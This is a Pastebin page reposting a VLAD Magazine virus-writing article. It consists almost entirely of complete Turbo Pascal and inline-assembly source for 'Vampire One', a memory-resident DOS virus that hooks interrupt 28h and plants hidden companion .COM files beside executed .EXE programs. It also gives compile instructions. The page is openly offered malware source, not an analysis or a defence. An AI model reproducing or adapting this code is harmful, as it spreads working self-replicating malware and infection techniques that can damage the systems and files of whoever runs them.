Advertisement
FlyFar

VLAD Magazine - Issue AF - ARTICLE.3_4 - Vampire-1 resident .EXE infector

Jul 1st, 2023
2,060
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Pascal 3.73 KB | Cybersecurity | 0 0
  1. {
  2.                               Vampire One
  3.  
  4.   Vampire One is a 3488 bytes spawning resident EXE infector. Vampire One
  5.   hooks interrupt 28h and infects the owner of the environment segment.
  6.  
  7.   Compile it with Turbo Pascal v 7.00 or else it won't work correctly.
  8. }
  9.  
  10. {$M 1552, 0, 0}
  11. Program VampireOneVirus;
  12.  
  13. Uses
  14.   Dos;
  15.  
  16. Const
  17.   BufSize        = 3488;
  18.   HeaderID       = 'Vampire One';
  19.  
  20. Type
  21.   Buffer         = Array[0..BufSize - 1] of Char;
  22.  
  23. Var
  24.   ParamCount     : Byte;
  25.   EnvironmentOff : Word;
  26.   EnvironmentSeg : Word;
  27.   Error          : Word;
  28.   Handle         : Word;
  29.   IntOff         : Word;
  30.   IntSeg         : Word;
  31.   PSPSeg         : Word;
  32.   DOSIdleAddr    : Procedure;
  33.   DOSIdleID      : String[11];
  34.   Filename       : String[80];
  35.   Parameters     : String[128];
  36.   FileBuf        : Buffer;
  37.  
  38. Procedure GetIntAddr(IntNo : Byte); Assembler;
  39.  
  40. Asm
  41.   MOV   AH,35h
  42.   MOV   AL,IntNo
  43.   INT   21h
  44.   MOV   IntOff,BX
  45.   MOV   IntSeg,ES
  46. End;
  47.  
  48. Procedure CreateNewFile(Filename : String; Attributes : Word); Assembler;
  49.  
  50. Asm
  51.   PUSH  DS
  52.   MOV   AH,5Bh
  53.   MOV   CX,Attributes
  54.   LDS   DX,Filename
  55.   INC   DX
  56.   INT   21h
  57.   POP   DS
  58.   JNB   @Done
  59.   MOV   Error,AX
  60.   @Done:
  61.   MOV   Handle,AX
  62. End;
  63.  
  64. Procedure OpenFile(Filename : String; Access : Byte); Assembler;
  65.  
  66. Asm
  67.   PUSH  DS
  68.   MOV   AH,3Dh
  69.   MOV   AL,Access
  70.   LDS   DX,Filename
  71.   INC   DX
  72.   INT   21h
  73.   POP   DS
  74.   JNB   @Done
  75.   MOV   Error,AX
  76.   @Done:
  77.   MOV   Handle,AX
  78. End;
  79.  
  80. Procedure CloseFile; Assembler;
  81.  
  82. Asm
  83.   MOV   AH,3Eh
  84.   MOV   BX,Handle
  85.   INT   21h
  86.   JNB   @CloseError
  87.   MOV   Error,AX
  88.   @CloseError:
  89. End;
  90.  
  91. Procedure ReadFile(Var FileBuf : Buffer; ReadNum : Word); Assembler;
  92.  
  93. Asm
  94.   PUSH  DS
  95.   MOV   AH,3Fh
  96.   MOV   BX,Handle
  97.   MOV   CX,ReadNum
  98.   LDS   DX,FileBuf
  99.   INT   21h
  100.   POP   DS
  101.   JNB   @Done
  102.   MOV   Error,AX
  103.   @Done:
  104. End;
  105.  
  106. Procedure WriteFile(FileBuf : Buffer; WriteNum : Word); Assembler;
  107.  
  108. Asm
  109.   PUSH  DS
  110.   MOV   AH,40h
  111.   MOV   BX,Handle
  112.   MOV   CX,WriteNum
  113.   LDS   DX,FileBuf
  114.   INT   21h
  115.   POP   DS
  116.   JNB   @Done
  117.   MOV   Error,AX
  118.   @Done:
  119. End;
  120.  
  121. Procedure GetSegments; Assembler;
  122.  
  123. Asm
  124.   MOV   AH,51h
  125.   INT   21h
  126.   MOV   ES,BX
  127.   MOV   ES,ES:[2Ch]
  128.   MOV   EnvironmentSeg,ES
  129.   MOV   PSPSeg,BX
  130. End;
  131.  
  132. Procedure WhoExecute;
  133.  
  134. Begin
  135.   EnvironmentOff := 0;
  136.   Filename := '';
  137.   GetSegments;
  138.   Repeat
  139.     EnvironmentOff := EnvironmentOff + 1;
  140.   Until MemW[EnvironmentSeg : EnvironmentOff] = $00;
  141.   EnvironmentOff := EnvironmentOff + 4;
  142.   Repeat
  143.     Filename := Filename + Chr(Mem[EnvironmentSeg : EnvironmentOff]);
  144.     EnvironmentOff := EnvironmentOff + 1;
  145.   Until Mem[EnvironmentSeg : EnvironmentOff - 1] = $00;
  146. End;
  147.  
  148. Procedure DOSIdleHandler; Interrupt;
  149.  
  150. Begin
  151.   Error := $00;
  152.   WhoExecute;
  153.   If Filename[Length(Filename) - 1] = 'E' then Begin
  154.     CreateNewFile(Copy(Filename, 1, Length(Filename) - 4) + 'COM' + #0, $22);
  155.     If Error = $00 then Begin
  156.       WriteFile(FileBuf, BufSize);
  157.       CloseFile;
  158.     End;
  159.   End;
  160.   Inline($9C);
  161.   DOSIdleAddr;
  162. End;
  163.  
  164. Begin
  165.   GetIntAddr($28);
  166.   For IntOff := IntOff + $8B to IntOff + $95 do DOSIdleID := DOSIdleID + Chr(Mem[IntSeg : IntOff]);
  167.   WhoExecute;
  168.   If DOSIdleID <> HeaderID then Begin
  169.     OpenFile(Filename, $00);
  170.     If Error = $00 then Begin
  171.       ReadFile(FileBuf, BufSize);
  172.       CloseFile;
  173.       If Error = $00 then Begin
  174.         GetIntVec($28, @DOSIdleAddr);
  175.         SetIntVec($28, @DOSIdleHandler);
  176.       End;
  177.     End;
  178.   End;
  179.   Filename := Copy(Filename, 1, Length(Filename) - 4) + 'EXE';
  180.   For ParamCount := 1 to Mem[PSPSeg : $0080] do Parameters := Parameters + Chr(Mem[PSPSeg : $0080 + ParamCount]);
  181.   SwapVectors;
  182.   Exec(Filename, Parameters);
  183.   SwapVectors;
  184.   If (DOSIdleID <> HeaderID) and (Error = $00) then Keep(0);
  185. End.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement